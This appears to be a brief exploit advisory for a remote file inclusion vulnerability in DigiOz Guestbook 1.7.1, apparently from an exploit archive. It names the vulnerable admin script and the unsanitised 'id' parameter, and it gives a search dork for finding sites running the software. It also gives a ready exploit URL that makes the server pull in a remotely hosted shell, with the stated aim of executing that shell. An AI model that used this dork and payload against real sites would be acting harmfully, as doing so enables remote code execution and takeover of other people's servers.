DigiOz Guestbook version 1.7.1 suffers from a remote file inclusion vulnerability.
279931bf1efcfc114f7654b849131329da7ce741c7fbb388c5eec1dc29c08861
DigiOz Guestbook 1.7.1
---------------------------
App: DigiOz Guestbook 1.7.1
Source: http://www.digioz.com/guestbook/guestbook.zip
Author: Arham Muhammad
Dork: "Powered by DigiOz Guestbook Version 1.7.1"
Vulnerable File: /admin/delete_process.php
Vulnerable Code: $id = $_GET['id'];
This Vulnerability Requires Admin Session To Be Present
In Order To Exploit This,Later This Vulnerability Can Be Used To Upload Or
Execute A Shell!
Exploit: http://site/path/admin/delete_process.php?id=http://sh3ll
Shouts: USMAN,Hackman,tushy,str0ke,